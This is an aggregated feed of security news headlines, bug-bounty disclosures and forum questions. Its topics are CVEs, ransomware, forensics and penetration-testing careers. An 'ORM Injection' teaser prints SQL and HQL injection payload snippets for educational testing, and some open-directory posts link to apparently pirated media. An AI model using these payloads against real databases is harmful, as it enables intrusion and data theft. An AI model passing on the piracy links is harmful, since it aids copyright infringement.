    View the talk schedule here, and then jump into the corresponding playlist: Breaking Ground, Common Ground, Ground Floor, Ground Truth, Hire Ground, I Am The Cavalry, Passwords Con, Proving Ground. submitted by /u/sanitybit [link] [comments]
    SharkFest'21 Wireshark Conference Playlist - hours of free netsec and network analysis content
    submitted by /u/haveitall [link] [comments]
    Constant-Time Data Processing At a Secret Offset, Privacy and QUIC
    submitted by /u/sanitybit [link] [comments]
    How BSD Authentication Works
    submitted by /u/sanitybit [link] [comments]
    TTPs Associated With a New Version of the BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    evilgophish
    submitted by /u/edreatingmonkey [link] [comments]
    OSCP 110 - My own cheat sheet
    submitted by /u/_kawhl [link] [comments]
    Groovy Template Engine Exploitation - Notes from a real case scenario
    submitted by /u/0xdea [link] [comments]
    Zero Day Initiative — CVE-2022-34715: More Microsoft Windows NFS v4 Remote Code Execution
    submitted by /u/jeandrew [link] [comments]
    Linux CONFIG_WATCH_QUEUE LPE
    submitted by /u/Gallus [link] [comments]
    Vulnerability Management for Go
    submitted by /u/sanitybit [link] [comments]
  • Open

    Partition$Extend$Deleted Files
    Hi all, I’m working on a case where I see hundreds of files being modified/created from the above location. It doesn’t appear to be related to the USN journal as I’m not seeing USN in the file path. What would cause this? Research online hasn’t been all that helpful. Hoping someone can point me in the right direction. Thanks in advance. submitted by /u/hotsausce01 [link] [comments]
  • Open

    Bug bounty via polyglot XSS payloads ($$$)
    I am writing this especially for bug bounty enthusiasts — you too, from testing the standard simple XSS payloads on all the bug bounty sites… Continue reading on Medium »
    The Difference Between Vulnerability, Threat and Risk
    Terms in the Domain of Cyber Security Continue reading on Medium »
    How I found 3 RXSS on the Lululemon bug bounty program
    Hi everybody, today I will show you how a simple technique can lead you to find multiple series vulnerabilities across the whole set of subdomains. Continue reading on InfoSec Write-ups »
    How I found 3 RXSS on the Lululemon bug bounty program
    Hi everybody, today I will show you how a simple technique can lead you to find multiple series vulnerabilities across the whole set of subdomains. Continue reading on Medium »
    Welcome Quidli
    Welcome home, Quidli! Continue reading on Medium »
    Q teams up with Immunefi to launch a bug bounty program
    We are happy to announce the launch of our bug bounty program on Immunefi. Continue reading on Q Blockchain »
    New Bug Bounty Alert: Welcome InsureDAO
    A new partnership with InsureDAO begins! A couple of months ago, we announced our beginner partnership with InsureDAO, which… Continue reading on Medium »
  • Open

    CVE-2020-10735: Prevent DoS by large int<->str conversions
    Article URL: https://github.com/python/cpython/issues/95778 Comments URL: https://news.ycombinator.com/item?id=32753681 Points: 2 # Comments: 1
  • Open

    Exotic data exfiltration
    Hey there, thought I would share my slides from #defcon #adversaryvillage : https://github.com/sourcefrenchy/DEFCON-30---Exotic-Data-Exfiltration submitted by /u/Necessary-Look-4159 [link] [comments]
  • Open

    NthLink VPN tries to hide evidence of vulnerability
    Article URL: https://twitter.com/snawoot/status/1567554873536692224 Comments URL: https://news.ycombinator.com/item?id=32753062 Points: 3 # Comments: 0
  • Open

    SecWiki News 2022-09-07 Review
    B站流式传输架构的前世今生 by ourren 更多最新文章,请访问SecWiki
  • Open

    THM: Intro to C2
    Learn the essentials of Command and Control to help you become a better Red Teamer and simplify your next Red Team assessment! Continue reading on System Weakness »
    TryHackMe Red Teaming Pathway
    TryHackMe never ceases to astound us with its unique and simple approach to teaching cybersecurity content. Continue reading on Medium »
    Security Orchestration Automation & Response
    SOAR solutions enhance cybersecurity by combining automation, orchestration, and threat data collection from multiple sources, as well as… Continue reading on Medium »
  • Open

    Immature hacker group behind ModernLoader launches attacks on Eastern Europe
    In June Cisco discovered an attacker who launched three separate campaigns; the attacker's skills were not advanced enough to develop custom tooling, so off-the-shelf tools were used instead.
    Multiple techniques for the HTB Talkative box
    1. Information gathering 1. Port scanning: scanning with nmap found five open TCP ports. There is one Apache (80), three Tornado (8080, 80801 and 8082), and something on 3000 that looks like HTTP. Based on the Apache version, the host is probably running Ubuntu 22.04 jammy. Tornado is a Python-based web framework designed to work with Python asynchronous methods. 2. Directory brute
    EvilProxy, a phishing-as-a-service platform able to bypass two-factor authentication, appears on the dark web
    Researchers at Resecurity recently discovered a new phishing-as-a-service (PhaaS) platform, EvilProxy.
    FreeBuf Morning Report | Security vulnerability in an Apache IoTDB module; Los Angeles Unified School District hit by ransomware attack
    The grafana-connector module of the open-source project Apache IoTDB has an unauthorized-access vulnerability; an attacker may be able to obtain the database's internal structure through the web service.
    Moobot botnet "sets its sights on" D-Link routers
    The MooBot botnet targets vulnerable D-Link routers, mixing old and new vulnerabilities to launch attacks.
    2.5 million student loan records leaked in a breach
    The leaked personal information is very likely to be used by attackers in future social engineering or phishing campaigns.
  • Open

    Schizophrenic MKUltra Collections and More
    http://jedi-sec.space/jedi-sec.space/docuploads/ submitted by /u/blue_Kazoo82 [link] [comments]
    Danish tv show, wipeout Denmark
    Found this which is an true gem. It even has the winter episodes which is so rare to find in good quality. This is very rare, so grab it before it’s gone https://creamy.oreos.workers.dev/0:/Wipeout.PACK.DANiSH.PDTV.XviD/ submitted by /u/manitobawater [link] [comments]
    All alex jones movies in good quality
    https://creamy.oreos.workers.dev/0:/mirrorbot/Alex%20Jones%20Movie%20Pack%20480p%20DVDRip%20x264/ submitted by /u/manitobawater [link] [comments]
    Can't use google dorks to search for certain file types anymore in search engines (google and duckduckgo)?
    You used to be able to find a plethora of open directories on the internet just by using classic Google dorks like filetype:mp4 ... But for some reason this doesn't work anymore. Does anyone know why, or know of an alternative search engine to comb the internet for files of a certain type? Some file extensions, like pdf and xls, still work. But mp3, mp4, epub, exe, and several others I tested are no longer searchable. Edit: Apparently, this is the link to all the file types Google indexes: https://developers.google.com/search/docs/advanced/crawling/indexable-file-types I swear they used to index just about all common file types. submitted by /u/shad_x9000 [link] [comments]
  • Open

    Russian researchers described the secret functions of search engines. Recently, in the channel of Russian-speaking…
    Continue reading on Medium »
    OSINT Podcasts
    I’m interested in OSINT (open source intelligence), and I listen to podcasts to keep learning. Continue reading on Medium »
  • Open

    ORM Injection
    🔍 Introduction
    ORM Injection is an injection attack that occurs in the ORM (Object Relational Mapping) layer and is closely related to SQL Injection. ORM (Object Relational Mapping) is a technique that automatically maps objects in source code to data in an RDBMS, giving objects persistence. Representative examples are Hibernate, Laravel's Eloquent, and Django/Rails' ActiveRecord. An attacker can inject SQL commands by exploiting vulnerabilities in the database access layer code generated by the ORM tool, or problems in how the developer uses the ORM. Apart from the use of an ORM tool or framework and a data access layer, it is almost identical to SQL Injection.
    🗡 Offensive techniques
    Detect
    Services that use an ORM can be relatively safer than applications that use SQL queries directly. However, the developer may make mistakes while handling the functionality mapped to objects, and if an old version of the ORM framework is used, known public vulnerabilities may apply. Applications built with frameworks in which ORMs are commonly used can be identified through the related public vulnerabilities and by testing the implemented parts: Ruby on Rails, Django, Laravel, JPA (Hibernate), etc. Tools such as Wappalyzer make it easy to identify the service. The rest of the testing is the same as for SQL Injection.
    Magic Functions
    DBMS / SQL Injection
    MySQL: abc' INTO OUTFILE --
    PostgreSQL: $$='$$=chr(61)||chr(0x27) and 1=pg_sleep(2)||version()'
    Oracle: NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'
    MS SQL: 1
    See SQL Injection > Exploitation.
    HQL
    Enum Columns
    from BlogPosts where title like '%' and DOESNT_EXIST=1 and ''='%'...
  • Open

    String length restriction bypass at https://callerfeel.mtnonline.com/profile/feedback.html
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1638347
  • Open

    Spring Cloud Function SpEL expression injection
    Author: VLab扫地僧@墨云科技 VLab Team. Original link: https://mp.weixin.qq.com/s/MiKWnGuyXTTLQVKjq2E_Gw Vulnerability overview Spring Cloud Function is a function-computing (FaaS) framework based on Spring Boot; the project provides a general model for deploying function-based software on a variety of platforms, including FaaS platforms such as Amazon AWS Lambda...

  • Open

    Bug Bounty { How I found an SSRF ( Reconnaissance ) }
    Hello everyone, I am S Rahul, working as an Information Security Analyst at NUK 9 Auditors and a bug bounty hunter at HackerOne, Bugcrowd… Continue reading on System Weakness »
    Bug Bounty { How I found an SSRF ( Reconnaissance ) }
    Hello everyone, I am S Rahul, working as an Information Security Analyst at NUK 9 Auditors and a bug bounty hunter at HackerOne, Bugcrowd… Continue reading on Medium »
    New Bug Bounty Alert: Welcome InsureDAO
    A new partnership with InsureDAO begins! A couple months back we announced our beginner partnership with InsureDAO allowing projects to be… Continue reading on Medium »
    All about: Cross-Site Request Forgery
    What is CSRF? Continue reading on Medium »
    Exploiting Out-of-Band XXE in the Wild
    Hello all, I hope you’re fine! Our story today is about one of the most interesting bugs I found, actually, it’s my first time finding… Continue reading on Medium »
    What would I do if I start bug hunting from 0 again?
    Hi everyone, Continue reading on Medium »
  • Open

    Help With Psort.py -> ELK
    Good afternoon, I'm getting the following error when trying to output psort to ELK https://preview.redd.it/4yzce6gisam91.png?width=907&format=png&auto=webp&s=34e57efd80265b20ab5972b8a12f568cf4cbbcda I've done pip install --upgrade pyelasticsearch, but it is still saying that pyelasticsearch is unsupported. Any help is appreciated. Thanks, DBR submitted by /u/DeadBirdRugby [link] [comments]
    FTK imager is returning different hashes
    Hello guys, I am not an expert in this field; hopefully, I get help from you. I do have a question: I created forensic images of a hard drive via FTK Imager. Actually, I created two images, one for records and the second one to work on. The issue is the forensic images have different hashes and I haven't touched the data on the hard disk imaged. Is this something expected? I checked the .txt file that FTK creates and the hash didn't match in the two images. Thanks in advance! submitted by /u/ampenate [link] [comments]
    I have two Android devices to play with, what would be some good forensics software to lean on?
    I have two Android devices and I'd like to explore some Android forensics. One of them, however, I don't know the passcode to. I assume everything will be encrypted on the one I can't unlock? Can I even get an image off of it? submitted by /u/RobbieRigel [link] [comments]
    Investigation
    Hi, everyone! I'm new in this field, and I try to practice some stuff. I wondered if I get an image of a disk, then can I get access to it in a virtual machine environment? Like VirtualBox or Hyper-V? Because I tried both of them but unfortunately I kept getting errors and errors, so I'm here asking those who have experience :') submitted by /u/symbolofperfection [link] [comments]
    Help with figuring out odd RDP event
    Hey y'all, I am struggling to come to a conclusion about an RDP event I have noted in a job. The log was identified on a Microsoft RDS server (let's call it WIN-RDS); it was an Event ID 21. WIN-RDS has an internal IP of 10.1.1.10 and an external IP of 192.178.1.1. The associated Windows Event ID on WIN-RDS is 21 and states the source network address is 192.178.1.1.... remember that WIN-RDS has captured this event log and 192.178.1.1 is its own public IP address... Anyone able to shine some light onto how an RDP session can happen on the RDS from its own public IP??? I am struggling to find anything to help my cause and really don't want to put it down as an anomaly, as malicious activity happened during this RDP session. submitted by /u/Phorc3 [link] [comments]
  • Open

    What kind of user activity or suspicious machine do you look out for and how?
    Currently in my organisation, I frequently check to see if anyone tried logging in from overseas from unknown countries, and it then causes a high number of alerts in 365 Defender. Other suspicious activity I look out for is contractors that want to access shares. USB ports are disabled by default; anyone who wants to use a USB needs to seek approval. I usually do grill a bit, as USB is frowned upon IMO, and then only give them temp access. What other activities do you look for in your organisation and how? Thanks submitted by /u/securm0n [link] [comments]
    Is there a Mitre Att&ck mapping to NIST Threat Events?
    For those of you who are familiar with Risk Assessment frameworks, I am wondering if any of you are aware of any mapping between Threat Events (e.g. using NIST 800-30) and the Mitre Att&ck techniques. I am essentially looking for something similar to the following: NIST Threat Event X = Mitre Att&ck techniques 1, 3 & 5. NIST Threat Event Y = Mitre Att&ck techniques 6 & 8. ...or vice versa. Link to references: NIST Threat Events: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-30r1.pdf Mitre Att&ck Matrix for Enterprise: https://attack.mitre.org submitted by /u/EmergencyShow [link] [comments]
  • Open

    Reflected Xss in []
    U.S. Dept Of Defense disclosed a bug submitted by s1m0x1: https://hackerone.com/reports/1033253
    Reflected cross site scripting in https://
    U.S. Dept Of Defense disclosed a bug submitted by maskedpersian: https://hackerone.com/reports/1636345
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1627616
    solr_log4j - http://
    U.S. Dept Of Defense disclosed a bug submitted by hachimanxienim: https://hackerone.com/reports/1631370
    _log4j - https://
    U.S. Dept Of Defense disclosed a bug submitted by hachimanxienim: https://hackerone.com/reports/1631364
    Stored XSS at https://
    U.S. Dept Of Defense disclosed a bug submitted by shanekag: https://hackerone.com/reports/1620247
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1626962
    Access to administrative resources/account via path traversal
    U.S. Dept Of Defense disclosed a bug submitted by j4k3d: https://hackerone.com/reports/1326352
    XSS DUE TO CVE-2020-3580
    U.S. Dept Of Defense disclosed a bug submitted by cruxn3t: https://hackerone.com/reports/1606068
    The dashboard is exposed in https://
    U.S. Dept Of Defense disclosed a bug submitted by alitoni224: https://hackerone.com/reports/1566758
    Subdomain takeover of
    U.S. Dept Of Defense disclosed a bug submitted by martinvw: https://hackerone.com/reports/1457928
    Modifying Sprunk vs eCola crew data
    Rockstar Games disclosed a bug submitted by bugstar: https://hackerone.com/reports/1680818 - Bounty: $250
    IDOR Payments Status
    Omise disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1538669 - Bounty: $100
  • Open

    Sensitive Command Token - So much offense in my defense
    submitted by /u/0xdea [link] [comments]
    Ryuk Ransomware: History, Timeline, and Adversary Simulation
    submitted by /u/achilles4828 [link] [comments]
    Vulnerability Analysis of CVE-2018-12613 – phpMyAdmin 4.8.1 Remote Code Execution
    submitted by /u/sandeep1337 [link] [comments]
    23 year old Denial of Service bug in Curl
    submitted by /u/sanitybit [link] [comments]
    Unpatched Unauthenticated Blind SSRF in WordPress Core
    submitted by /u/monoimpact [link] [comments]
    How to turn security research into profit: a CL.0 case study
    submitted by /u/albinowax [link] [comments]
    Hardware debug probes for JTAG debugging for Intel and AMD - Necrosys/x86-JTAG-Information
    submitted by /u/Gallus [link] [comments]
    TA505 Group's TeslaGun In-Depth Analysis
    submitted by /u/wtfse [link] [comments]
    SAT/SMT Solvers by Example
    submitted by /u/ambray_ [link] [comments]
  • Open

    Attacking GPP (Group Policy Preferences) Credentials | Active Directory Pentesting
    A very common and easy attack that provides user credentials stored in SYSVOL share that can be used to get a shell or escalate privileges. Continue reading on Medium »
    Error: /bin/bash^M: bad interpreter: No such file or directory (Linux).
    Hello Community, I recently ran into a “/bin/bash^M: bad interpreter” error in a GitHub project, and I'll share with you how… Continue reading on Medium »
  • Open

    some software and stuff
    http://37.156.146.163/PUB/ submitted by /u/Deafcon2018 [link] [comments]
    Open iAVATAR files?
    I downloaded some models I wanted to use for a project, but they’re all iAVATAR files and I have no idea how to open these. submitted by /u/32mafiaman [link] [comments]
  • Open

    SX August 2022 Report
    Volume, Key Metrics and Projections for September Continue reading on SX Network »
  • Open

    SecWiki News 2022-09-06 Review
    [HTB] Chatterbox Writeup by 0x584a; OPSWAT 2022 Malware Analysis Survey Report by Avenger. For more recent articles, visit SecWiki
  • Open

    Interview: Baptiste Robert
    Hacker, disinformation fighter, Elliot Continue reading on Medium »
    OSINT Crypto Quiz
    I came across this OSINT quiz by OSINT Dojo a while ago, but i’ve only just gotten round to having a look at it. Continue reading on Medium »
    Association Matrix
    An association matrix is an analysis technique used in intelligence to identify associations between various points of interest. This can… Continue reading on Medium »
    The rise of TikTok as an OSINT tool
    As TikTok continues to surpass other social media platforms as the go-to app for information as well as entertainment, we take a closer… Continue reading on Medium »
    Trains, planes, boats: three sites for following global traffic in real time
    Continue reading on Medium »
  • Open

    Vulnerability Management for Go
    Article URL: https://go.dev/blog/vuln Comments URL: https://news.ycombinator.com/item?id=32737886 Points: 300 # Comments: 51
    Vulnerability: Are LucidCharts Safe When Shared to Confluence?
    Article URL: https://reco.ai/vulnerability-report-lucid-charts/ Comments URL: https://news.ycombinator.com/item?id=32732280 Points: 1 # Comments: 0
  • Open

    FFUF : Tooling Series
    Hey guys, it’s me Uday, and today I’ve found a very interesting tool and I would like to share the information that I’ve collected, so let’s… Continue reading on Medium »
  • Open

    Mirai Variant MooBot Targeting D-Link Devices
    Attackers are leveraging known vulnerabilities in D-Link devices to deliver MooBot, a Mirai variant, potentially leading to further DDoS attacks. The post Mirai Variant MooBot Targeting D-Link Devices appeared first on Unit 42.
  • Open

    SOVA gone wild: the new "benchmark" for Android banking trojans
    Security researchers have also found that SOVA has added an unexpected new capability: it can encrypt data on mobile devices such as phones and carry out ransomware attacks.
    FreeBuf Morning Report | TikTok denies user data and source code leak; Instagram fined 400 million euros for violating children's privacy
    The Irish regulator fined Instagram 405 million euros for violating children's privacy; Meta says it will appeal.
    Another record fine: Meta fined 400 million US dollars for violating GDPR
    On September 6, news that Meta had been fined roughly 400 million US dollars for violating GDPR quickly set the tech world abuzz.
    Everyone a hacker? EvilProxy launches a one-click reverse proxy service
    Once the capabilities EvilProxy advertises become reality, anyone could become a hacker, and enterprise security will face a massive phishing threat.
    Code injection vulnerabilities in CI/CD pipelines affect Google and Apache open-source GitHub projects
    Security vulnerabilities in CI/CD pipelines can be exploited by attackers to compromise the development process and push malicious code at deployment time. Recently, researchers found a pair of security vulnerabilities in the GitHub environments of two very popular open-source projects from Apache and Google that could be used to covertly modify project source code, steal secrets and move laterally within an organization. According to researchers at Legit Security, the issues are continuous integration/continuous delivery (CI/CD) flaws that could threaten many more open-source projects worldwide, currently mainly affecting Google
    The emerging cross-platform BianLian ransomware is picking up speed
    The operators of the emerging cross-platform BianLian ransomware expanded their command-and-control (C2) infrastructure this month, a development that suggests the group's operational tempo is accelerating. Written in the Go programming language, BianLian ransomware was first discovered in mid-July 2022 and as of September 1 had claimed 15 victim organizations. Notably, this emerging double-extortion ransomware family is unrelated to the Android banking trojan of the same name, which mainly targets mobile banking and cryptocurrency apps to steal sensitive information. Security researchers Ben Ar
    Chisel-Strike: a powerful .NET XOR-encrypted CobaltStrike Aggressor implementation
    With this tool we can achieve faster proxying and more advanced Socks5 functionality.
  • Open

    SurFree: a fast surrogate-free black-box adversarial attack algorithm
    Author: seven010@墨云科技VLab Team Original link: https://mp.weixin.qq.com/s/XYpeT7tdVD7l-LfFrhDm-g Today I recommend a paper on an efficient decision-based black-box adversarial attack algorithm: SurFree: a fast surrogate-free black-box attack, which has been accepted at CVPR 2021. Paper: https://arx...
  • Open

    I patched my Slack client to keep "Oops" messages others delete
    submitted by /u/sh0n1z [link] [comments]
    Anatomy of an exploit in Windows win32k - CVE-2022-21882 - Avira Blog
    submitted by /u/jeandrew [link] [comments]
    Shielder - How to Decrypt Manage Engine PMP Passwords for Fun and Domain Admin - a Red Teaming Tale
    submitted by /u/smaury [link] [comments]
    Simple IBM i (AS/400) hacking
    submitted by /u/buherator [link] [comments]
    Hacking my Helium Crypto Miner
    submitted by /u/wez32 [link] [comments]
    Walkthrough of an unauthenticated RCE affecting pfBlockerNG <= 2.1.4_26 (CVE-2022-31814)
    submitted by /u/IHTeam [link] [comments]
    CVE-2022-30190, AKA Follina, Uses Macro-less Word Docs to Drop RCE Files
    submitted by /u/anyore909 [link] [comments]
    PoC: resolving dynamically System Service Numbers (SSN) for syscalling in VBA (x64) using FreshyCalls technique
    submitted by /u/gid0rah [link] [comments]
  • Open

    No password length restriction in reset password endpoint at http://suppliers.mtn.cm
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1285694
    firebase credentials leaks @ https://mtnhottseat.mtn.com.gh
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351326
    firebase credentials leaks @ https://mpulse.mtnonline.com
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351329
    CVE-2021-38314 @ https://www.mtn.ci
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351338
    CVE-2021-38314 @ https://www.mtn.co.rw
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351341
    Exposed gitlab repo at https://adammanco.mtn.com/api/v4/projects
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1351359
    Information disclosure through django debug mode
    MTN Group disclosed a bug submitted by aliyugombe: https://hackerone.com/reports/1434276
    API key (api.semrush.com) leak in JS-file
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1218754 - Bounty: $500
  • Open

    MyComputerCareer instructor is curious about how FS compare in terms of undelete
    So I'm an adjunct instructor for My Computer Career, A+ and Linux Essentials. I have done a little tiny bit of computer forensics in my life. I am preparing a slide to teach the students some "above and beyond" information about computer forensics, mainly undeleting files. I've played with PhotoRec, for instance, and I remember in the 90s the undelete tool of Norton Utilities. So as I am studying up about the various filesystems, I am noting the differences between how ext2, ext3/4, ntfs and fat32 delete files. For those who do a lot of undelete or forensics with drives, would you be willing to give your opinion as to the filesystem that makes file undeletion the easiest? I'm thinking ext2 or FAT16/32 but I am not an expert in this field. Thanks in advance! submitted by /u/OneEyedC4t [link] [comments]
    How does Volatility translate a physical frame back to its process?
    I want to know how Volatility knows, from a memory dump, to which process a physical frame belongs. I think I'm familiar with how the OS translates a virtual address to a physical one. So a virtual address space is split into pages. Each virtual address is translated to a physical address via page tables. A physical address is a memory address within a physical frame inside my memory dump. How does Volatility determine to which process a physical frame belongs? I'm mostly interested in Windows if this makes any difference. submitted by /u/13pcfx37 [link] [comments]
    Forensic Analyst to Threat Hunter
    Hey everyone, I was wondering what your thoughts are in regards to career progression as a forensic analyst. I’m currently in the DFIR space and am a forensic analyst consultant for a decent sized company. I’m curious as to what you think would be progression in the field. Would it just to keep going on the forensic path and eat and breathe forensics? Or would going into Threat Hunting keep my career moving? Probably a debatable topic but I’m always trying to see what I need to do to keep sharp and moving in the right direction. Thanks in advance everyone. submitted by /u/thiefofalways1313 [link] [comments]
  • Open

    Shodan?
    I have a set search I do on Shodan to look for open Calibre libraries... and suddenly I noticed that the number of overall results is WAY lower. Like, there used to be dozens of results for, say, the United Kingdom. Now there's only... 16. 6 for all of Australia. Anyone else notice this? What gives? submitted by /u/look_who_it_isnt [link] [comments]
  • Open

    How do you deal with phishing incidents within your organisation
    Slightly curious to know and understand how organisations deal with phishing incidents. Typically one would assume the following: Block sender and delete all phishing emails from within the gateway Reset user password and revoke sessions Run AV scan and isolate off the network submitted by /u/securm0n [link] [comments]
    need advice for bug hunting as absolute beginner
    Hi everyone, a noob here who wants to be a bug bounty hunter. I have watched some YouTube videos talking about how to become an ethical hacker. Most of them talk about reading writeups and doing CTFs; they mention some websites like hacker101 and tryhackme, but I don't know where to begin if I know nothing about hacking. I have done a little bit of coding in Linux, know some very basic Linux commands, and have used Kali & Ubuntu. I know core Python & JavaScript. But talking about hacking, I know nothing. Just tell me about the best way to enter the infosec domain from a bug hunting perspective & what resources to follow. Thank you in advance; your advice will be very helpful for me. PS: I also don't have any knowledge about networking, so recommend me a book or something. submitted by /u/gagan_anttal [link] [comments]
    SANS GDSA
    Hi, does the content for the GDSA exam get updated regularly? I mean if one did the course several years ago but didn't do the cert at the time would the current exam now be considerably different to the course subject matter from a 3-4 years ago? Thanks submitted by /u/Veedubius [link] [comments]
    Password managers
    While LastPass and 1Password are the most known password managers, many suggest Bitwarden here on Reddit. What makes it a better choice, besides the price? Any thoughts on RoboForm, which is one of the oldest and fairly cheaper than the other two? submitted by /u/Giorgin07 [link] [comments]
  • Open

    What is a Pentest?
    Explaining in simple terms what a Pentest is and what types of Pentest there are. Continue reading on Medium »
    Career Advice: Passing the OSCP Made Simple
    If there’s anything to take out of my blog read “START BEFORE YOU START!”. Continue reading on Medium »
    Career Advice: OSCP Made Simple
    If there is anything to take out of my blog read “START BEFORE YOU START!”. Continue reading on Medium »
  • Open

    Smart Contract Security, WAF Bypassing, HTTP Parameter Pollution, Race Condition, IDOR, Web…
    No content preview
    Why broken access control is the most severe vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Timelapse from HackTheBox — Detailed Walkthrough
    No content preview
    Phoenix Challenges — Stack One
    No content preview
    Passing a Role to AWS CloudFormation to Escalate Privileges
    No content preview
    Pen #007: Wi-Fi Hacking 101
    No content preview
    Bayanay — Python Wardriving Tool
    No content preview
  • Open

    Google Chrome’s latest update has a security fix CVE-2022-3075
    Article URL: https://www.theverge.com/2022/9/5/23337648/google-chrome-install-update-security-vulnerability Comments URL: https://news.ycombinator.com/item?id=32726199 Points: 5 # Comments: 0
  • Open

    Fuzzcheck: Modular, structure-aware, and feedback-driven fuzzing engine for Rust
    Article URL: https://fuzzcheck.neocities.org/introduction.html Comments URL: https://news.ycombinator.com/item?id=32726078 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-09-05 Review
    SecWiki Weekly (Issue 444) by ourren; Design and Implementation of an AI-Based Database Anomaly Monitoring System by 路人甲; Using Nginx, Tyk Gateway API and the CloudFlare Firewall to Hide C2 Infrastructure by 路人甲; Internal Network Penetration: Notes from a First Run-Through by SecIN社区. For more recent articles, visit SecWiki
  • Open

    Is this an accurate visualization of the problem with EDR visibility?
    submitted by /u/Jonathan-Todd [link] [comments]
  • Open

    Community Testing V2 of BusyChain launched — bug-hunting!
    Busy is happy to reveal the second and last long-awaited Community Testing event V2. The updated version of BusyChain testnet V3 goes… Continue reading on BusyTechnology »
    Why broken access control is the most severe vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    IDOR “Insecure direct object references”, my first P1 in Bugbounty
    First Whoami : Dris R. A Security Researcher, Penetration Tester from Paris ,France. Continue reading on Medium »
    Bug Bounty for Beginners
    In the world of cyber security, there is a constant battle between white hat hackers (security researchers who identify vulnerabilities to… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Samsung admits leak of US customer information; Apple zero-day exploit on sale for 8 million euros
    Samsung said it experienced an attack in which the intrusion allowed hackers to access certain data, such as the names, contact and demographic information, dates of birth and product registration details of some US users.
    WINGFUZZ SaaS: an online intelligent fuzz testing platform
    As the first fuzz testing SaaS platform in China, the beta version is now open for free registration.
    Russian ride-hailing app Yandex hacked, causing traffic jams in Moscow
    The Russian ride-hailing app Yandex was hacked, and hundreds of drivers were "sent" to the same pickup point in the Moscow area, causing a large-scale traffic jam.
    Attack traced to the US National Security Agency: report on the cyberattack against Northwestern Polytechnical University released
    The cyberattack on Northwestern Polytechnical University was carried out by the US National Security Agency (NSA). In the attack on the university, the NSA used more than 40 proprietary cyberattack weapons.
    US IRS accidentally leaked confidential information of 120,000 taxpayers
    The leaked information came from a form called 990-T, which is mainly used by non-profit organizations (charities) or IRA (individual retirement account) and SEP accounts.
  • Open

    XNX
    Continue reading on Medium »

  • Open

    ISO/IEC Standard that defines terminology for AuthN, AuthZ
    Ask NetSec, what is the ISO/IEC standard that defines terms such as Principal, Authorisation, Authentication, User, Identity Provider, Service Provider? submitted by /u/CyberStagist [link] [comments]
    WCNA (Wireshark Certified Network Analyst)
    Has anyone taken the WCNA (Wireshark Certified Network Analyst) exam? I'd like to get an idea for how difficult the exam is. The study guide is ~1000 pages. submitted by /u/SharkByte1333 [link] [comments]
    I think I got ripped off by my company and have a low salary, Did I?
    So I am a 25 year old woman and I have been working since I was 18. So I have quite some experience. I changed job to a cybersecurity company as a Technical Pre-Sales consultant for 57.000€ annually (Munich, Germany). And I found out recently that the Account Executive that we have, who has a few years more experience than me, earns 120k€ annually. I accepted the salary because at the time I was desperate and told them anything above 55K€ would be fine. My mistake, yes. But the difference between our salaries now is making me very dissatisfied and a bit angry. What are my options? submitted by /u/warwitchxx [link] [comments]
    Career Path Question
    Hey guys, I've been thinking about where I go from here for a while and need some help figuring out my next move. At the moment I head up a team internally doing secops (including vulnerability management and some of the more technical security architecture). I'm not sure I want to continue heading up a department but don't really want to lose out on the $$. I'm not a CISO and report into one. I was looking at furthering my technical skills and trying my hand at getting into IR companies like FireEye or the MS DART team, or getting to the point where I could do purple teaming engagements non-stop. I came from a technical background but have done security architecture, SOC and GRC (I'm not cut out for GRC); my offensive security isn't up to scratch and I was looking at the PNPT as a first step and PortSwigger Academy for brushing up on my web app. If I was to dive deeper into DFIR, is there anything outside of SANS (GIAC) certs / courses that match the quality? And finally, but almost as important, how much do guys doing IR on a retainer basis make and how much do purple teamers earn? submitted by /u/alphayun [link] [comments]
  • Open

    WPHash - Fingerprinting WordPress Plugins, now in public beta and open to feedback and collaboration
    submitted by /u/_cydave [link] [comments]
  • Open

    CyberDefenders: Exfiltrated Walkthrough
    SPOILER ALERT: THIS IS A POSSIBLE SOLUTION Continue reading on Medium »
  • Open

    How I found my first SSRF to RCE!
    Hi Guys, Continue reading on Medium »
    Mindset that made me one among Top 15 Security Researcher’s in India for 3 Consecutive Times!
    Hey All , Continue reading on Medium »
    Google Bug Bounty Program for Open Source Projects.
    Welcome future Cybersecurity Crack’s to my fifth post this time we are going to learn about the Google Bug Bounty for Open Source Projects Continue reading on Medium »
  • Open

    SecWiki News 2022-09-04 Review
    No news updated today~ For more recent articles, visit SecWiki
  • Open

    Possible Hunt for Vulnerable Apache Geode Servers (CVE-2022-37021)
    Article URL: https://isc.sans.edu/diary.html?storyid=0 Comments URL: https://news.ycombinator.com/item?id=32714273 Points: 1 # Comments: 0
    Nat-Again: IRC NAT helper flaws (CVE-2022-2663)
    Article URL: https://dgl.cx/2022/08/nat-again-irc-cve-2022-2663 Comments URL: https://news.ycombinator.com/item?id=32711688 Points: 9 # Comments: 0
  • Open

    IDOR Leads To Account Takeover Without User Interaction
    MTN Group disclosed a bug submitted by theranger: https://hackerone.com/reports/1272478
  • Open

    "Living-Off-the-Blindspot", or how you can operate in EDRs' blindspot with Python
    Here's "Living-Off-the-Blindspot", or how you can operate in EDRs' blindspot with Python. If you missed my @DEFCON @AdversaryVillag talk you'll find in the post all the information and the demo videos presented. Enjoy! EDR #evasion #OST #redteaming submitted by /u/naksyn_ [link] [comments]
  • Open

    SPY NEWS: 2022 — Week 35
